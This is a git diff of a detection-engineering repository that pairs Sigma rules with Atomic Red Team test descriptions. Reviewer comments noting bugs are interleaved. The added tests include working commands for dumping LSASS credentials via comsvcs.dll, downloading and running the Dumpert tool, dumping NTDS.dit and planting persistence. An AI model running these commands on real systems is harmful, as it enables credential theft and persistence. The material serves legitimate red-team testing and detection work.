+| **Author** | Florian Roth |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: PowerShell DownloadFile
+id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
+status: experimental
+description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
+references:
+ - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
+author: Florian Roth
+date: 2020/03/25
+tags:
+ - attack.execution
+ - attack.t1086
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|contains|all:
+ - 'powershell'
+ - '.DownloadFile'
+ - 'System.Net.WebClient'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8f70ac5f-1f6f-4f8e-b454-db19561216c5 <[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005) |
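Review bot: `CommandLine|contains|all` with `'powershell'`, `'.DownloadFile'` and `'System.Net.WebClient'` is emitted as `CommandLine.keyword:*powershell*` in es-qs; wildcard queries on a plain `keyword` field are case-sensitive, so `PowerShell.exe` or `POWERSHELL` command lines only match if the index applies a lowercase normalizer (the `system32`/`System32` duplication added in `win_system_exe_anomaly.md` below is a symptom of the same issue). `falsepositives: - Unknown` also understates it for a `level: high` rule: `WebClient.DownloadFile` is common in administrative and deployment scripts, and that should be documented so analysts can whitelist known scripts.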
| **ATT&CK Technique** | - [T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)
|
-| **Data Needed** | - [DN_0038_1102_the_audit_log_was_cleared](../Data_Needed/DN_0038_1102_the_audit_log_was_cleared.md)
- [DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)
|
+| **Data Needed** | - [DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)
|
| **Trigger** | - [T1070: Indicator Removal on Host](../Triggers/T1070.md)
|
| **Severity Level** | high |
| **False Positives** | - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)
- System provisioning (system reset before the golden image creation)
|
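Review bot: Removing `DN_0038_1102_the_audit_log_was_cleared` from Data Needed and keeping `DN_0050_1102_audit_log_was_cleared` deduplicates the two Event 1102 entries, but the part of the commit shown here neither deletes the `DN_0038` file nor updates any other rule that may still reference it; confirm the `Data_Needed` directory no longer contains the superseded entry and that no remaining rule links to it, otherwise the duplication just moves elsewhere.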
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
index 376b6ba..4d04313 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
@@ -24,7 +24,7 @@ description: It is extremely abnormal for svchost.exe to spawn without any CLI a
references:
- https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
author: David Burkett
-date: 12/28/2019
+date: 2019/12/28
tags:
- attack.t1055
logsource:
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md b/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
index 0d4de79..a9cc79d 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
@@ -6,7 +6,7 @@
| **Data Needed** | - [DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)
- [DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)
|
| **Trigger** | There is no documented Trigger for this Detection Rule yet |
| **Severity Level** | high |
-| **False Positives** | |
+| **False Positives** | |
| **Development Status** | experimental |
| **References** | - [https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon](https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon)
|
| **Author** | Kirill Kiryanov, oscd.community |
@@ -36,7 +36,8 @@ detection:
- 'unload'
- 'sys'
condition: selection
-falsepositives: Unknown
+falsepositives:
+ - Unknown
level: high
fields:
- CommandLine
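Review bot: `-falsepositives: Unknown` becoming a list (`+falsepositives:` / `+ - Unknown`) is required by the Sigma schema, which expects a sequence there. The `| **False Positives** | |` change in the first hunk of this file looks whitespace-only (the cell is empty before and after); if the table generator emits trailing spaces non-deterministically, that churn will reappear on every regeneration and is worth fixing in the generator rather than in the output.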
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md b/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
index db3faca..bc1e4bc 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
@@ -48,10 +48,11 @@ detection:
- '*\lsm.exe'
- '*\winlogon.exe'
- '*\explorer.exe'
- - '*\taskhost.exe'
+ - '*\taskhost.exe'
filter:
Image:
- 'C:\Windows\System32\\*'
+ - 'C:\Windows\system32\\*'
- 'C:\Windows\SysWow64\\*'
- 'C:\Windows\SysWOW64\\*'
- 'C:\Windows\explorer.exe'
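Review bot: Adding `- 'C:\Windows\system32\\*'` next to `- 'C:\Windows\System32\\*'` (alongside the existing `SysWow64`/`SysWOW64` and `winsxs`/`WinSxS` pairs) enumerates casing variants because the es-qs backend emits case-sensitive `Image.keyword` wildcards; this covers `system32` but not `SYSTEM32` or `Syswow64`, and since the filter is the exclusion, any system process logged with an unlisted casing falls through and raises a false alert. A lowercase normalizer on `Image.keyword`, or lowercasing `Image` at ingest, is the durable fix; if the list stays, a comment in the rule explaining why the duplicates exist would stop someone from "cleaning them up" later. The `'*\taskhost.exe'` line change is indentation-only.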
@@ -76,42 +77,42 @@ level: high
### es-qs
```
-(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
+(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\system32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
```
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/e4a6b256-3e47-40fc-89d2-7a477edd6915 <
@@ -353,7 +357,7 @@ del %temp%\security >nul 2> nul
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
-Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp.
+Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
@@ -403,7 +407,88 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
-## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
+## Atomic Test #6 - Dump LSASS.exe Memory using comsvcs.dll
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
+
+Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
+```
+
+
+
+
+
+
+
+
+## Atomic Test #7 - Dump LSASS.exe Memory using direct system calls and API unhooking
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
+https://github.com/outflanknl/Dumpert
+https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
+Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.
+
+If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003\bin\Outflank-Dumpert.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+#{dumpert_exe}
+```
+
+#### Cleanup Commands:
+```cmd
+del C:\windows\temp\dumpert.dmp >nul 2> nul
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
+Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
+```
+
+
+
+
+
+
+
+## Atomic Test #8 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
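Review bot: Atomic Test #7's Get Prereq Commands fetch `Outflank-Dumpert.exe` from `github.com/clr2of8/Dumpert` at a pinned commit, while the test description links `github.com/outflanknl/Dumpert`; pinning is good, but the text should state that the binary comes from that fork so readers know what is being downloaded and run with elevation. Test #6 (`comsvcs.dll, MiniDump` writing `$env:TEMP\lsass-comsvcs.dmp`) has a matching cleanup but no `Dependencies` section, which is only fine because `comsvcs.dll` ships with Windows, and that is worth saying. The two bare URLs in #7's description also need blank lines around them, as the other tests in this file format their references.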
@@ -433,7 +518,7 @@ Manager and administrative permissions.
-## Atomic Test #7 - Offline Credential Theft With Mimikatz
+## Atomic Test #9 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
@@ -488,7 +573,7 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
-## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
+## Atomic Test #10 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -535,7 +620,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
-## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
+## Atomic Test #11 - Create Volume Shadow Copy with NTDS.dit
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -578,7 +663,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
-## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
+## Atomic Test #12 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -652,7 +737,7 @@ mkdir #{extract_path}
-## Atomic Test #11 - GPP Passwords (findstr)
+## Atomic Test #13 - GPP Passwords (findstr)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
**Supported Platforms:** Windows
@@ -688,7 +773,7 @@ Write-Host Joining this computer to a domain must be done manually
-## Atomic Test #12 - GPP Passwords (Get-GPPPassword)
+## Atomic Test #14 - GPP Passwords (Get-GPPPassword)
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
This test is intended to be run from a domain joined workstation, not on the Domain Controller itself.
The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.
@@ -745,7 +830,7 @@ Write-Host Joining this computer to a domain must be done manually
-## Atomic Test #13 - LSASS read with pypykatz
+## Atomic Test #15 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
@@ -804,7 +889,7 @@ pip3 install pypykatz
-## Atomic Test #14 - Registry parse with pypykatz
+## Atomic Test #16 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1015.md b/Atomic_Threat_Coverage/Triggers/T1015.md
index 0cbed15..95fc877 100644
--- a/Atomic_Threat_Coverage/Triggers/T1015.md
+++ b/Atomic_Threat_Coverage/Triggers/T1015.md
@@ -70,7 +70,7 @@ $input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
$item = $item.trim()
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
+ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f | Out-Null
}
```
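Review bot: `| Out-Null` on the `reg delete ... /v Debugger /f` cleanup line only discards the success text on stdout (`The operation completed successfully.`); when an entry in `#{parent_list}` was never created, `reg.exe` reports the error on stderr, which `Out-Null` doesn't touch, so the loop still prints errors. If a silent cleanup is the goal, redirect stderr as well (`2>$null`, or `*>$null`); if the intent is to surface real failures, the current form is acceptable and the change only hides the success lines.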
diff --git a/Atomic_Threat_Coverage/Triggers/T1023.md b/Atomic_Threat_Coverage/Triggers/T1023.md
index dae833d..3917672 100644
--- a/Atomic_Threat_Coverage/Triggers/T1023.md
+++ b/Atomic_Threat_Coverage/Triggers/T1023.md
@@ -13,7 +13,8 @@
## Atomic Test #1 - Shortcut Modification
This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
-gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL
+gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
+Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
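Review bot: The `+` line appends a period to the inline PowerShell example (`... | Select-String -Pattern "exe" | FL.`), which turns a copy-pasteable command into an invalid one (`FL.` is not a cmdlet alias). Put the sentence-ending period outside the command, or move the command into a code fence as the Attack Commands below are.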
@@ -23,16 +24,22 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| shortcut_file_path | shortcut modified and execute | path | shortcutname.url|
+| shortcut_file_path | shortcut modified and execute | path | %temp%\T1023_modified_shortcut.url|
#### Attack Commands: Run with `command_prompt`!
```cmd
-echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
+echo [InternetShortcut] > #{shortcut_file_path}
+echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
+#{shortcut_file_path}
```
+#### Cleanup Commands:
+```cmd
+del -f #{shortcut_file_path} >nul 2>&1
+```
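Review bot: `del -f #{shortcut_file_path} >nul 2>&1` in the new Cleanup Commands uses a Unix-style `-f`; `cmd.exe`'s `del` takes `/F` (force read-only) and `/Q` (quiet) and treats `-f` as a second file name, so the command only appears to work because the "Could Not Find" error for `-f` is hidden by `2>&1`. Use `del /F /Q #{shortcut_file_path} >nul 2>&1`. Splitting the attack command is a genuine fix: the old one-liner wrote `[InternetShortcut]` to `test.url` but appended `URL=` to `#{shortcut_file_path}`, so the two files never matched.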
@@ -42,7 +49,8 @@ echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #
## Atomic Test #2 - Create shortcut to cmd in startup folders
-LNK file to launch CMD placed in startup folder
+LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
+to view the new shortcut.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1028.md b/Atomic_Threat_Coverage/Triggers/T1028.md
index d77820b..43d8267 100644
--- a/Atomic_Threat_Coverage/Triggers/T1028.md
+++ b/Atomic_Threat_Coverage/Triggers/T1028.md
@@ -20,7 +20,7 @@
## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
-Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
+Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
@@ -50,7 +50,7 @@ Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
-Upon successful execution, cmd will spawn calc.exe on a remote computer.
+Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
@@ -63,11 +63,11 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
| computer_name | Name of Computer | string | computer1|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `powershell`!
-```cmd
-powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+```powershell
+[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
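Review bot: Switching the test from `command_prompt` to `powershell` drops the `powershell.exe` prefix but carries the command over otherwise unchanged, including the misspelled `.Documnet.ActiveView` member; as committed the test fails with a property-not-found error and never exercises the detection it is meant to trigger, so the spelling should be corrected in the same change. The two earlier hunks in this file (`Upon successful execution, ...`) are whitespace-only.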
diff --git a/Atomic_Threat_Coverage/Triggers/T1031.md b/Atomic_Threat_Coverage/Triggers/T1031.md
index 075da46..c7a696c 100644
--- a/Atomic_Threat_Coverage/Triggers/T1031.md
+++ b/Atomic_Threat_Coverage/Triggers/T1031.md
@@ -35,7 +35,7 @@ sc start Fax
#### Cleanup Commands:
```cmd
-sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
+sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
```
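Review bot: Appending `>nul 2>&1` to `sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"` silences a cleanup step that restores the original service binary path after the test changed it; if `sc config` fails (access denied, or the Fax service is absent), the service is left pointing at the test path and nobody sees the error. Keep stderr visible here, or check `%errorlevel%` and echo a warning on failure.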
diff --git a/Atomic_Threat_Coverage/Triggers/T1032.md b/Atomic_Threat_Coverage/Triggers/T1032.md
index 5fa35b0..08b6e2b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1032.md
+++ b/Atomic_Threat_Coverage/Triggers/T1032.md
@@ -35,7 +35,7 @@ Upon successful execution, powershell will make a network connection to 127.0.0.
```powershell
$server_ip = #{server_ip}
$server_port = #{server_port}
-$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', #{server_port})
+$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
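Review bot: the two assignments above the changed line, `$server_ip = #{server_ip}` and `$server_port = #{server_port}`, substitute the values unquoted (a bare `127.0.0.1` is not a valid PowerShell literal) and the variables are then never used, because the `TcpClient` line re-substitutes the placeholders directly. Either quote the assignments and pass `$server_ip, $server_port` to `New-Object Net.Sockets.TcpClient(...)`, or drop the two assignments. Quoting `'#{server_port}'` on its own is harmless since PowerShell converts the string to the `int` parameter of the `TcpClient(string, int)` constructor.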
diff --git a/Atomic_Threat_Coverage/Triggers/T1035.md b/Atomic_Threat_Coverage/Triggers/T1035.md
index 574699b..0d1ec12 100644
--- a/Atomic_Threat_Coverage/Triggers/T1035.md
+++ b/Atomic_Threat_Coverage/Triggers/T1035.md
@@ -77,7 +77,7 @@ Upon successful execution, powershell will download psexec.exe and spawn calc.ex
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/Atomic_Threat_Coverage/Triggers/T1037.md b/Atomic_Threat_Coverage/Triggers/T1037.md
index 50eea1f..50139ce 100644
--- a/Atomic_Threat_Coverage/Triggers/T1037.md
+++ b/Atomic_Threat_Coverage/Triggers/T1037.md
@@ -28,7 +28,8 @@ Mac allows login and logoff hooks to be run as root whenever a specific user log
## Atomic Test #1 - Logon Scripts
-Adds a registry value to run batch script created in the C:\Windows\Temp directory.
+Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
+that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
@@ -38,7 +39,7 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| script_path | Path to .bat file | String | $env:SystemRoot\Temp\art.bat|
+| script_path | Path to .bat file | String | %temp%\art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037-log.txt|
@@ -46,15 +47,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
```cmd
-echo cmd /c "#{script_command}" > #{script_path}
-REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
+echo "#{script_command}" > #{script_path}
+REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
```
#### Cleanup Commands:
```cmd
-REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
-del #{script_path} >nul 2>nul
-del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
+REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
+del #{script_path} >nul 2>&1
+del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
```
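Review bot: replacing `echo cmd /c "#{script_command}" > #{script_path}` with `echo "#{script_command}" > #{script_path}` writes the surrounding quotes literally into the batch file, so the generated line now starts with a quote and cmd no longer sees `echo` as the command; with the default `script_command` the line becomes `"echo Art "Logon Script" ... >> ...txt"` and the redirection ends up inside a quoted token. Keep the `cmd /c` wrapper (which strips the outer quotes) or write the command without quotes. The added `/f` on `REG.exe ADD` is correct, since the value may already exist from a previous run.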
@@ -65,7 +66,8 @@ del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
## Atomic Test #2 - Scheduled Task Startup Script
-Run an exe on user logon or system startup
+Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
+the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
@@ -83,8 +85,8 @@ schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c ca
#### Cleanup Commands:
```cmd
-schtasks /delete /tn "T1037_OnLogon" /f
-schtasks /delete /tn "T1037_OnStartup" /f
+schtasks /delete /tn "T1037_OnLogon" /f >nul 2>&1
+schtasks /delete /tn "T1037_OnStartup" /f >nul 2>&1
```
@@ -129,7 +131,9 @@ Mac logon script
## Atomic Test #4 - Supicious vbs file run from startup Folder
-vbs files can be placed in and ran from the startup folder to maintain persistance
+vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World VBS!" will be displayed twice.
+Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
+folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
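Review bot: the new description says the files are in `"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"`, but the cleanup line shown in the next hunk header removes them from `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\`, which is the all-users Startup folder, a different location; the description should point at the folder the test actually writes to. The expected output string "T1137 Hello, World VBS!" carries the wrong technique ID for a T1037 test, and "Supicious" / "persistance" in the heading and first line should be "Suspicious" / "persistence".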
@@ -162,7 +166,9 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Supicious jse file run from startup Folder
jse files can be placed in and ran from the startup folder to maintain persistance.
-Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
+Upon execution, "T1137 Hello, World JSE!" will be displayed twice.
+Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
+folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
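Review bot: same location mismatch as in Test #4, the added text names `$env:APPDATA\...\Startup` while the cleanup context line targets `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta...`; and "T1137 Hello, World JSE!" again uses the wrong technique ID.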
@@ -195,7 +201,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Supicious bat file run from startup Folder
bat files can be placed in and executed from the startup folder to maintain persistance.
-Upon execution, cmd will be run and immediately closed.
+Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
+folder and will also run when the computer is restarted and the user logs in.
**Supported Platforms:** Windows
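Review bot: the added sentence repeats the `$env:APPDATA\...\Startup` path, which does not match the `C:\ProgramData\...\StartUp` folder used by the cleanup commands for these startup-folder tests; "persistance" should be "persistence".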
diff --git a/Atomic_Threat_Coverage/Triggers/T1044.md b/Atomic_Threat_Coverage/Triggers/T1044.md
index 749f88c..bfdf996 100644
--- a/Atomic_Threat_Coverage/Triggers/T1044.md
+++ b/Atomic_Threat_Coverage/Triggers/T1044.md
@@ -21,9 +21,12 @@ Another variation of this technique can be performed by taking advantage of a we
## Atomic Test #1 - File System Permissions Weakness
This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace.
-powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
+powershell -c "Get-WmiObject win32_service | select PathName" (check service file location) and
copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe ( replace weak permission file with malicious file )
+Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents read "T1044 Malicious file". To verify
+the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled.
+
**Supported Platforms:** Windows
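Review bot: the verification step refers to `%temp%\T1044_weak_permission_file.exe`, but the input default added in the next hunk is `$env:TEMP\T1044_weak_permission_file.txt`, so the extension is wrong; there is also a missing space in "to%temp%" and "it's contents" should be "its contents". Since the file is created by the prereq in the user's own `$env:TEMP`, "Full Control" will be shown for any user, so telling the reader to verify a weak permission there is misleading.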
@@ -32,7 +35,8 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| weak_permission_file | check weak files permission | path | GoogleUpdate.exe|
+| weak_permission_file | check weak files permission | path | $env:TEMP\T1044_weak_permission_file.txt|
+| malicious_file | File to replace weak permission file with | path | $env:TEMP\T1044\T1044_malicious_file.txt|
#### Attack Commands: Run with `powershell`!
@@ -40,12 +44,41 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
```powershell
Get-WmiObject win32_service | select PathName
-get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
+Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore
+Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
